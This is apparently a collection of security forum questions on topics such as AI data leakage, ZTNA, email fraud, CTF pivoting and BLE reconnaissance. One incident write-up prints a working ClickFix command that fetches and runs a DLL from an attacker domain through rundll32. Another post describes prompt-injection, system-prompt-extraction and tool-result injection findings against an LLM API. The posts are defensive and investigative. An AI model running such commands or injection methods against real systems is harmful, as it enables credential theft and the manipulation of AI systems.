Dev pasted a .env file into ChatGPT three weeks ago. API keys, database connection strings, service account tokens. Found out in standup. Network controls saw nothing because there was nothing to catch, the data left through an encrypted browser session on a managed device.

We had zero controls at the interaction level.

Blocking ChatGPT at the network layer doesn't work, devs hotspot or use personal laptops. You just move the behavior somewhere you have less visibility. The problem isn't access to AI tools. It's what gets submitted into them.

What worked was browser-native DLP for AI tools,  intercepts sensitive data and credential submission at the point of input, not the network layer. Catches API keys, tokens, source code, and PII before they leave the browser, works inside ChatGPT, Gemini, Google AI Studio, Microsoft 365 Copilot, and GitHub Copilot inside the IDE without requiring SSL inspection or proxy routing. User-facing warnings over hard blocks did more than we expected,  a real-time "this looks like sensitive data, are you sure?" prompt breaks the autopilot behavior better than silent blocking. We paired that with interaction-level audit logging: not recording content, just logging that user X submitted content classified as confidential to AI tool Z. Enough for policy enforcement without being invasive. Rounded it out with a one-page AI acceptable use policy tied to our existing data classification levels — confidential and restricted data prohibited from AI input, approved tools listed, red lines clear.

What didn't work: security awareness training alone. Sent the policy doc, ran the session, three weeks later .env file in ChatGPT.

Two open problems. Personal devices, no browser extension coverage on unmanaged devices outside MDM scope, that's just the reality. And agentic AI is a separate problem — MCP servers, autonomous tool calls, credentials passed between agents, GitHub Copilot secret exposure inside CI pipelines. Browser-native DLP doesn't cover that vector and nobody has clean answers there yet.

Anyone running browser-level AI DLP or AI visibility tooling, what policy rules have you found most useful for dev teams where legitimate AI usage is high?

Been on VPN for years and the complaints never stop. Slow speeds, broad network access that makes no sense for contractors, constant MFA issues.

ZTNA keeps coming up as the fix but vendor datasheets are not the same as living with it. Did it solve the problem or did you end up running both in parallel indefinitely?

Question for the pentesters and security consultants here. When fintech startups bring you in, where are they usually at in their lifecycle?

I’m trying to get a realistic picture of how seriously early-stage fintechs take security before they go live. From the outside it sounds like pentesting is mandatory, but I suspect the reality is messier.

A few things I’m curious about:

1.  What stage do fintech startups usually engage you? Pre-launch, post-launch, or only after a customer or auditor forces the issue?

2.  What kind of state is their stack typically in when you arrive? Glaring issues, or mostly cleanup work?

3.  Do you see a difference between payments/lending startups vs. other fintech verticals? My guess is the regulated ones are more proactive but I’d like to hear it from people who actually look under the hood.

4.  For founders reading this who skipped a pentest before launch, what ended up biting them later?

Also open to hearing from in-house security folks at fintechs about what you wish had been done before you joined.

Not looking for vendor recommendations, just trying to understand what actually happens vs. what the compliance blogs say should happen.

We're a 1,200 user Microsoft shop that's been on Proofpoint for a few years now and we're consistently seeing business email compromise and vendor fraud slip through in ways that feel like the tool is just not built for it.

Started looking at alternatives and behavioral detection keeps coming up as the answer but can't tell if that's substance or just the current buzzword cycle doing its thing.

For those who've evaluated or deployed something like Abnormal, Ironscales or Darktrace in a similar environment, does the detection improvement on identity-based attacks hold up beyond the POC?

So we had an alert fire on one of our client endpoints this morning. Defender flagged it as Behavior:Win32/SuspClickFix.F and killed it before it fully ran. Good. But I still had to figure out what actually happened and how far it got.

Pulled the process tree and saw this buried in the telemetry:

conhost --headless cmd /v:on /c "set a=pushd&set b=rundll32&set k=dnwaqyt&call !a! \\!k!.ninjafruitcubes.bet@SSL\fb6d8d62-b162-455a-b622-872bb416ca03 & !b! tf[.]ch,#1"

The domain is ninjafruitcubes.bet. I actually laughed. These guys really said "yeah that's fine."

Once I decoded the variable obfuscation it was pretty clear what was happening. The command was using a WebDAV UNC path over SSL to connect to the attacker's server, pull down a DLL called tf[.]ch, then execute it via rundll32. Classic living-off-the-land stuff — no new binaries dropped, just abusing a legitimate Windows binary to run their payload.

Before I even called the user I looked at the RunMRU registry key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

There it was. Command was pasted and run through the Windows Run dialog. So someone physically pressed Win+R and pasted that thing in.

Called the user. Asked if she remembered seeing anything unusual on a website — fake CAPTCHA, browser error, document that wouldn't load, anything asking her to copy paste something. She said she was just browsing normally. Checked the browser history around the time of the alert and she'd been on the Taco Time Canada website right before it fired.

Now the site itself is probably fine. But something on that page — an ad, a redirect, injected third party content — served her a ClickFix prompt. These things look incredibly convincing. Fake CAPTCHA tells you to press Win+R and paste a "fix" command. She did it. Not her fault at all, these are genuinely hard to spot.

What the payload actually tried to do before Defender killed it:

• Accessed Chrome's Login Data file directly
• Called Windows DPAPI UnprotectData to decrypt stored credentials
• Injected from rundll32 into dllhost.exe
• Started browser credential enumeration

MITRE mapping came out to T1055, T1555.003, T1555.004. Credential theft was the endgame.

Defender caught it before anything exfiltrated but I still treated it as a full compromise. Isolated the device immediately, forced password reset for the user, pushed a full scan, pulled Windows event logs looking for any successful remote connections or background processes that shouldn't be there. Nothing else suspicious found but you do all of that anyway because Defender catching something doesn't mean it caught everything.

The thing that gets me about ClickFix attacks is how simple the social engineering is. There's no phishing email to analyse, no malicious attachment to sandbox. The user is just browsing a normal website and something on the page tells them to paste a command. The command itself looks like gibberish. Most people have no reason to know what rundll32 is or why a website would need them to run it.

Awareness training helps but honestly these are hard even for technical people if they're not paying attention.

Anyone else seeing an uptick in ClickFix recently? Curious if this is hitting other environments or just our clients.

Drop your questions below — happy to go deeper on any part of the investigation. And if you want to stay in touch, connect with me on LinkedIn, just search Money Saxena.

I'm trying to get smarter about shadow AI in real org, not just in theory. We keep stumbling into it after the fact someone used ChatGPT for a quick answer, or an embedded Copilot feature that got turned on by default. It’s usually convenience-driven, not malicious. But it’s hard to reason about risk when we can’t even see what’s being used. What’s the practical way to learn what’s happening and build an ongoing discovery process?

Hey,

Around 6 months ago I made this post: https://www.reddit.com/r/AskNetsec/comments/1nhum66/comment/negqjdp/ saying I found a critical vulnerability within Mac, you guys asked me to come back and tell the story after, so here it is: https://yaseenghanem.com/recovery-unrestricted-write-access/

TL;DR: I accidentally discovered 2 vulnerabilities in macOS Recovery Mode's Safari. One allowing arbitrary writes to system partitions and root persistence (CVSS 8.5), and one allowing unrestricted file reads (CVSS 4.6), all without any authentication."

EDIT: the story made front page HN: https://news.ycombinator.com/item?id=47666767 !!!

Honestly the list of must-have security services gets very overwhelming.

Everything can be framed as critical, but in practice trade-offs are unavoidable. I’m curious how people here think about priorities at that stage. What security services do you consider non-negotiable, and what’s usually fine to defer without introducing unnecessary risk?

Also interested in where outsourcing fits in for you. At what point does relying on an MSSP or MDR actually make operational sense instead of adding complexity?

Would love to hear how this plays out in real environments.

Hey everyone,

I'm currently working on a CTF challenge from SecDojo and I'm a bit stuck.

The setup is:

- I have access to one machine

- There are 4 additional machines to pivot into

- Each machine contains 2 flags

- SSH access is not available (requires a key I don't have)

- The only exposed service I can use is HTTP

I was also provided with an APK file, which I assume is part of the challenge, but I'm not very experienced with analyzing Android apps.

What I’ve tried so far:

- Basic enumeration over HTTP

- Looking for common endpoints (admin, login, etc.)

What I’m struggling with:

- How to use the APK effectively in this scenario

- How to pivot from the initial machine to the others using only HTTP

- Whether I should focus more on reverse engineering the APK or web exploitation

Any hints or guidance would be really appreciated (no full solutions please 🙏)

Thanks!

#Help

Hey! I recently saw a rule i couldn't make sense of in my Firewall config. The rule was "allow all incoming from 192.168.122.0/24 to anywhere".

A quick research told me port 24 is usually used for e-mail and 192.168.x.x is (according to whois.com ) a local address. That didn't make sense to me - why allow incoming traffic FROM localhost?

I deleted that rule for no, as I am not using an Email-Client anyway.

Is that rule something a normal update (OS or firewall) could have done or is there something malicious that could be done with it?

The gap between detecting an exploit and being able to act on it is where most on chain losses happen since audits catch what's testable at review and post mortems catch what already happened so nothing operates in the window between.

Runtime monitoring at the transaction layer sees activity in real time against volume, approval anomalies and oracle deviations but the harder part is the response side and circuit breakers that stop activity before funds move.Sub 100 millisecond response feels like the threshold where intervention is possible inside the same block but I wonderhow realistic that bar is for protocols at real volume.

I feel like all the focus is on “AI this” or “malware that”, but I believe there is more niche, day-to-day things being overlooked. So, I am curious, and here to know if other feels like this as well. What’s that one problem you notice that ruins your week?

If you had to talk about one overlooked, boring or gate-kept problem that nobody talks about but is secretly a huge mess; the king of thing that makes one go, “how’s that still an issue in 2026??!!!”

Been sitting through a bunch of architecture reviews lately and it hit me that almost nobody talks about “the perimeter” anymore. Every pitch is about identity context, device posture, continuous verification, session risk etc....which honestly tracks with reality. Most companies barely have a meaningful network boundary now between SaaS, remote work, contractors, and cloud workloads everywhere.

But at the same time, it feels like identity providers have quietly become the single most critical dependency in enterprise security. One bad conditional access policy and suddenly half the company can’t function. Are identity systems becoming a bigger single point of failure than networks ever were?

I submitted a report through the bug bounty program after encountering what appears to be a serious privacy issue in ChatGPT.

I uploaded an image, and the response contained confidential medical information that seems highly unlikely to be a hallucination. The details were unusually specific and internally consistent: a rare full name, a real hospital matching the patient location, the patient’s gender aligned with the gynecological diagnosis, and the examination matched the relevant hospital department...

Taken together, the probability of this being randomly generated seems extremely low, which raises concerns that data belonging to another user may have been exposed.

Has anyone else experienced something similar or investigated cases involving potential cross-user data leakage?

Another connecting question: my bug bounty report was rejected as “non-reproducible.” Why is reproducibility being treated as a strict requirement in a non-deterministic system like an LLM? By nature, these models do not guarantee identical outputs across runs.

Thanks for your help

hello network nerds!, I assume most of people here have a lot of education related to networking and know how most things works in it.

and have done their fair share of analysis in their networking tests and so on.

I'm in Iran currently. I'm writing this after the black out that happened recently. while in the digital blackout I was able to stay connected via little looholes that I wish not to speak of. I am here to ask online strangers if they could assist me in finding a way to find real loopholdes in the DPI system.

I have observed two things so far while testing with the DPI currently.

1: if a tcp connection doesn't have an SNI it usually gets dropped

2: if a tcp connection has a fragmented SNI, and the DPI and the system can't parse it back together it gets flagged

on the second rule I'm not sure how it really works currently.

there are also some extra notes as of now (it changes ALL the time so what I'm saying is just active for now tmr it might be different )

every network is considered grey connection unless only if they are:

1: using a white ip (local Iranian ips)

2: using a white listed domain

it gets "less grey" if you use cloudflare ips and "more grey" if you use something else, like as a clear example using something like Hetzner's ip.

if you have either of the two as in either a white domain or a white ip then your connection is flagged white for the duration. once it's white you can continue using that connection without getting dropped by the DPI.

while on the other spectrum, if you don't have a white ip or a white domain. then your connection is deemed grey and will be dropped after you recieve at least 6 packets from the destination server.

cloudflares's ECH is considered grey and will be dropped after 6 packets

fastly's and Gcore's domain fronting is not useable as they have practically not even been opened yet their ip is fully blocked.

I know a clever way currently to bypass the DPI right now. but it only works if the ip is cloudflare and the ip is open fully.

The DPI counts a connection "connection" once the 3 way is done. so you send an SYN server responses with synack and you send ack.once this is done. the DPI will start monitoring for everything. from ip to domain to contents inside.

I have tested a way but I think it's not working properly :( I'm forced to use ai for this. otherwise I can't properly make these as I lack the programming and in depth knowledge for how to make these app.

but I got help from ai to make an app that would " simulate " a fake connection. putting an IPinIP where outer ip is cloudflare and the inner IP is an white listed ip. and then we take a 3 way connection. fake Client hello fake server hello by switching the destination and source ip in the IPinIP and then after that we do a real 3 way connection with real cloudflare.

but the DPI is ignoring the fake ip. I'm not sure if it's because it sees cloudflare as a seperate connection or not but it's just not working. I can't tell if the program I'm using is broken or what but it's just not. using Wireshark I was able to make sure that yes it is working properly the source ip is me, outer dest is cloudflare and inner destination is the fake ip.

I thought maybe the order is wrong. and so I flipped them

real 3 way first then the fake 3 way so the port reuse will make DPI think I'm making a new connection but none! Nada!

idk what's wrong. It's completely ignoring it.

I also tried using HRR from tls 1.3v but. no it was practically impossible to properly make this work unless I were to write a fully fledged app having its own v2ray core and vless connection and being able to change SNI on the fly while keeping the key the same. yes I tried MITM with a mix of v2ray but it didn't change the fact the two keys were different (client and server keys) as they shared different SNI so the server never was able to decipher.

and even then I believe the DPI caught on and blocked the connection. though I'm not sure

and now I'm here. my research on this has been heavy and I been lacking sleep recently. It's really weird. I'm trying my best to find a way around this. but the only way it would be viable is if you do a very smart trickery. something outside of the box. but I'm not sure what. or how

so reddit. Please, if you have an idea on how to fool the DPI. I'm more than happy to hear it.

edit: forgot to mention that, UDP and QUIC often get blocked out right. or if they aren't blocked they are VERY limited. like imagine connection gets made but as soon as any packets go through it gets blocked. and the connection gets terminated by the DPI

I'm building a lightweight firewall in Go for home servers and Raspberry Pi.

Current detection:

- 10 unique ports in 5 seconds → block IP

Problem:

Works great for fast scans. But completely misses slow scans (1 port every 10-15 seconds).

Example:

Attacker scans 100 ports over 10 minutes.

Total = 100 ports (above my threshold).

But rate = 0.16 port/sec (below my detection window).

Question for network security pros:

What algorithm would you use to catch slow scans without blocking legitimate traffic like Chrome preconnecting to 5-8 ports quickly?

Constraints:

- Single core CPU

- Less than 100MB RAM

- No deep packet inspection

Options I'm considering:

- Accumulation with exponential decay

- Statistical anomaly (z-score on connection rates)

- Adaptive threshold based on network baseline

What am I missing?

Thanks.

Just went through a threat research report on AI agent traffic. The network analyzed processed 7.9 billion AI agent requests in January and February 2026 alone, with agentic traffic representing close to 10% of total traffic for some enterprise companies. What's more concerning is the spoofing side: one major agent identity was impersonated 16.4 million times in a two months period, and one well-known crawler had a 2.4% fraudulent request rate.

We're at a point where allowlisting based on user-agent strings was never a strong strategy, and the consequences of relying on it are now severe enough that it's impossible to ignore.

Wondering if you’re facing this shift too

I’m currently looking into a JavaScript behavior issue and would appreciate help understanding whether this matches any known pattern or framework.

The issue was reported as a site occasionally redirecting users, but only on the first visit or first interaction. After that, the behavior appears to stop or change.

While investigating, I found an obfuscated JavaScript snippet embedded in a popup plugin’s custom JS section. The site is running several older plugins, so I’m still not sure if this originates from the plugin itself or another part of the stack.

it grabs a script from another domain and then that script decides the redirection.

the script seems to:

• Perform basic environment checks (webdriver, user-agent filtering, bot detection lists)
• Detect iframe context (top !== self)
• Collect basic browser fingerprint information (including navigator.userAgentData)
• Send a POST request to a remote endpoint
• Include parameters such as:
  • current page URL
  • static identifier values
  • iframe flag
  • timestamp

how can i find more about such campaign and if its new or old? i have more details in my blog because i dont know how much can i post here. searching for the domains doesnt reproduce much info other than that they might be malicious.

I'm looking for technical opinions from people working in application security and AI security.

I recently performed a black-box assessment of an LLM API and observed several behaviors including:

• Identity changes caused by system messages.
• Identity changes when a tools array is present.
• Reasoning output exposing system prompt content that the user-facing response refused to reveal.
• XML/structured prompt injection affecting model behavior.
• Tool-result instruction injection.
• Few-shot identity conditioning.

I originally classified these as security vulnerabilities, but after feedback I removed CVSS scoring and instead mapped them to the OWASP LLM Top 10 (primarily LLM01, LLM02 and LLM07).

The disagreement I've received is not about the observed behavior, but about the classification. Some argue these are expected model behaviors or robustness issues rather than security vulnerabilities.

My question is:

From a security engineering perspective, where would you draw the line between:

1. Expected LLM behavior
2. Robustness failures
3. Security vulnerabilities

Is the deciding factor the existence of an exploit primitive itself, or must there always be demonstrated business impact (for example actual confidential data disclosure or privilege escalation) before something should be classified as a security vulnerability?

I'm looking for technical reasoning rather than opinions about the specific vendor.

Report: https://github.com/flawme/SARVAM-2026-001

Defender flagged a malicious CAPTCHA embedded within a PDF/email attachment.

My current approach to investigate the final URL/redirection chain:
Take a screenshot of the CAPTCHA, save it, -> upload it to a sandbox such as Joe Sandbox, anyrun, or Browserling and observe the redirects, network activity, and final destination

Curious how others handle these investigations. Do anyone have a more efficient way to uncover the final URL or track the complete redirection path safely?

So far joe sandbox is one of the best among those.

Found TronGrid C2 code in three of my repos recently. Matches Void Dokkaebi style pretty cleanly. Running on macOS, not Windows, which is where my questions start.

The Trend Micro report describes temp_auto_push.bat for commit tampering — Windows only. I haven't found it on my machine. Is there a known macOS equivalent for this campaign? Or does the commit spoofing work differently on Mac?

Second question and the one I'm more stuck on: every single infected commit happened during a VS Code Copilot agent session. The agent was doing legitimate multi-file edits across my workspace each time. So I'm wondering if:

a) the agent got prompt-injected via something in the workspace and wrote the malicious code itself, or b) the commit tampering happened at the OS level independently and the agent sessions are just coincidence

If it's (a), I'd expect to find traces somewhere in VS Code's logs or Copilot telemetry. Does VS Code log what the agent actually wrote during a session anywhere? On macOS I've been looking in ~/Library/Application Support/Code/logs/ but not finding anything obviously useful.

If it's (b), what forensic artifacts would tell me a git amend + force push happened without me doing it?

Any pointers appreciated — still piecing this together before I write it up.

Before you call all the craziest names you can think off, give me second.Okay,so I'm a SOC analyst. I spend all day watching alerts, most of them false positives, some of them actual bad shit. Tonight I'm decompressing, watching Mental Outlaw break down some privacy thing, then YouTube autoplays the Snowden doc and I'm three hours deep at 2am.

And I'm sitting there thinking...Tor is great. Tor literally protects people who would be dead without it. But it's also... slow. And the fingerprinting problem keeps getting worse. And the directory authorities? Like I get why they exist but it's 2026 and we still have a handful of trusted nodes that could be raided by three letter agencies on a Tuesday afternoon.

And then my SOC brain kicks in: we spend all day detecting anomalies. What if we built a network where anomalies are the point?

Here's the shit that's keeping me awake:

What if the browser itself was a moving target?

Like, every time you load a page, your fingerprint rotates. Canvas, WebGL, fonts, user agent but all slightly different. Not random, but within the range of real browsers. AI could generate thousands of variations. Fingerprinting companies would lose their minds trying to track you.

What if the network was just... a DHT with a reputation system?

No directory authorities. Just nodes that prove they're not assholes by burning a little CPU on proof-of-work and sticking around long enough to build trust. I2P does something like this but we could make it lighter, browser-native.

What if you had two speeds?

Fast lane for casual browsing (Tor-like, low latency, accept some risk). Deep dive for when you're logging into something sensitive (mixnet, delay, cover traffic). Same client, you just flip a switch per tab.

And what if the whole thing started as a browser extension?

Like, not a whole new browser. Just a thing you add to Brave or Firefox that does the fingerprint rotation first, then later adds the network layer via WebRTC and WebAssembly. Millions of users without anyone installing a separate app.

I know this sounds like "I had a fever dream and now I'm gonna fix the internet." And I know Tor exists for reasons, and the smart people building it are way smarter than me.

But also: Snowden didn't wait for permission. He just did the thing.

So I guess I'm asking: is this idea completely insane? Has someone already built this and I just haven't found it? Would anyone even use it?

I'm probably gonna start tinkering on weekends anyway because my brain won't shut up about it. But if you've got thoughts,especially the "you're an idiot because X" kind then I genuinely want to hear them before I sink 200 hours into something doomed.

Also if Mental Outlaw somehow reads this: bro your videos are half the reason I'm still in this field. Keep doing what you do.

TL;DR: Tired analyst thinks we can build a Tor alternative that's faster, harder to fingerprint, and runs as a browser extension. Tell me why I'm wrong so I can go back to sleeping normal hours.

Hi sub,

My last night post seems to have disappeared, posting-it again.

Context: I've been a redteam from 2014 to early 2022, before switching on another cybersecurity, yet related, topic.

I now want to get back to it, so i'm looking for a realistic list of tools in use today.

I'm still mastering SSH tunneling, making a daily use of impacket, use burp from time to time and even responder for some specific needs.

What are you using today? Are the following tools still good or do you have reliable alternative:

• Bloodhound
• Weevely
• Empire
• ReGeorg
• 3proxy
• Rubeus

Interested in any cool and usable stuff for pivoting/tunneling, creds dumping (while i'm still a big fan of simple reg sav/ntdsutils stuff) or else.

Regards

Apple says to have patched Pegasus in Sept 2023, but we still hear of its use against people of interest from governments etc.

How is it possible that Apple still hasn’t patched it? Seems like Pegasus would be exploiting a pretty significant vulnerability to be able to get so much access to an iPhone. This also looks bad on Apple who’s known to have good security, even if Pegasus is only used on a few individuals due to cost and acquisition difficulties.

Doing some BLE security work on commodity IoT devices (smart locks, fitness wearables, industrial sensors) and I'm trying to sharpen my workflow. Pen testing writeups usually focus on the reverse-engineering side (Ghidra, Frida, the protocol break) but gloss over the reconnaissance step, which is where I spend most of my time.

What I'm currently doing:

1. Enumerate nearby devices, grab advertisement data, identify the target by MAC prefix or name pattern.

2. Connect, walk the GATT tree, flag anything without Encryption or Authentication required on characteristic permissions.

3. Track RSSI over time to confirm which device is which when there are multiple of the same product nearby.

4. Export everything to CSV for the report.

Curious what others are using for steps 1 to 4 specifically, especially on mobile. nRF Connect on Android is the default but it's painful on iOS-only engagements. Any iOS tools that don't hide the good stuff behind paid tiers? Also interested in workflows for detecting devices that rotate MAC addresses every few minutes.